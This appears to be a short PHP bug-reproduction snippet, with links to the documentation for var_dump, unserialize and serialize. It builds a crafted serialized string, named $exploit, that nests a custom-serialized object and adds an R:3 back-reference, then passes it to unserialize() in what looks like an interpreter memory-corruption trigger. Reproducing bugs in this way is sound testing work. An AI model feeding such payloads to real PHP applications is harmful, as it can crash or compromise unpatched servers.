- var_dump: documentation ( source)
- unserialize: documentation ( source)
- serialize: documentation ( source)
<?php
class obj implements Serializable
{
public $data;
}
$object = new obj();
$object->data = 1;
$inner = serialize($object);
$exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}';
$data = unserialize($exploit);
var_dump($data);